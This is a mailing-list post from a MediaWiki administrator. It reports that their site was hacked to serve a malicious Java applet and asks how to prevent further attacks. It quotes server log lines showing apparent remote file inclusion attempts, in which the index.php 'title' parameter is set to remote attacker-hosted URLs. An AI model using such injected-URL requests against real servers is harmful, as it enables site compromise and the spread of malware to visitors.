Hi Everyone, I hope this is the right place to ask about this (pls point me elsewhere is needed) Our MediaWiki was hacked (twice in the past month) and someone was able to change the root index.html files of our website and add an Iframe to it that loads a malicious java applet. If users select to run the applet it installs a virus/torjan on their PC. After reading the log file I am thinking it's the Wiki's index.php page. The hosting is NetworkS' who said that I have a vulnerable php script. And I should fix it. This is from the log files: XX.XX.XX.XX - - [29/Feb/2008:00:00:30 -0500] "GET /wiki/index.php?title=Http://uuionmaniskis.rbcmail.ru/images%3F HTTP/1.1" 200 1688 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" XX.XX.XX.XX - - [29/Feb/2008:00:00:29 -0500] "GET /wiki/index.php?title=http://uuionmaniskis.rbcmail.ru/images? HTTP/1.1" 301 96 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" XX.XX.XX.XX - - [29/Feb/2008:00:01:41 -0500] "GET /wiki/index.php?title=http://uuionmaniskis.rbcmail.ru/images? HTTP/1.1" 301 96 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" XX.XX.XX - - [29/Feb/2008:00:01:19 -0500] "GET /wiki/index.php?title=http://sschhhoolsucksmmman.krovatka.su/images? HTTP/1.1 <http://sschhhoolsucksmmman.krovatka.su/images?HTTP/1.1>" 301 96 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" XX.XX.XX.XX - - [29/Feb/2008:00:05:48 -0500] "GET /wiki/index.php?title=Http://zaperyan1918moon.chat.ru/html/aboutme%3F HTTP/1.1 <Http://zaperyan1918moon.chat.ru/html/aboutme%3FHTTP/1.1>" 200 1700 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" Can anyone advice on how to protect it/prevent future attacks? Thanks a lot in advance! Itay _______________________________________________ MediaWiki-l mailing list MediaWiki-l(a)lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/mediawiki-l